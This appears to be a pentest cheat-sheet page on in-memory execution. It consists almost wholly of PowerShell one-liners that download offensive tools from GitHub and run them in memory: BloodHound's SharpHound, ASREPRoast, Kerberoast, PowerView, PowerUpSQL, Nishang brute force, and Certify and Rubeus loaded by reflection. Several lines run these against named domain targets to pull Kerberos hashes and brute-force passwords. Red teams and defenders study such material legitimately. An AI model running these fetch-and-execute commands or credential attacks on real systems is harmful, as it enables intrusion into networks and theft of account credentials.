In-memory execution

Some examples of in-memory .exe and .ps1

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/refs/heads/master/Collectors/SharpHound.ps1')

Invoke-BloodHound

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/refs/heads/master/ASREPRoast.ps1')

Get-ASREPHash -Username PRTG.USER -verbose

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/refs/heads/master/data/module_source/credentials/Invoke-Kerberoast.ps1')

Invoke-Kerberoast -OutputFormat hashcat

$url = "https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_Any/Certify.exe"

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); 

[Certify.Program]::Main("find /vulnerable".Split(" "))

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1')

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/refs/heads/master/PowerUpSQL.ps1')

IEX(New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/raw/master/Scan/Invoke-BruteForce.ps1')

Invoke-BruteForce -ComputerName DC-02.COMPANY.LOCAL -UserList samaccountnames.txt -PasswordList passwords.txt -Service ActiveDirectory -Verbose > output.txt

$url = "https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_Any/Rubeus.exe"

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); 

[Rubeus.Program]::Main("brute /users:M:\Export\s.txt /passwords:M:\Export\p.txt /domain:FLEXKIDS.LOCAL /outfile:o.txt".Split(" "))

Last updated 8 months ago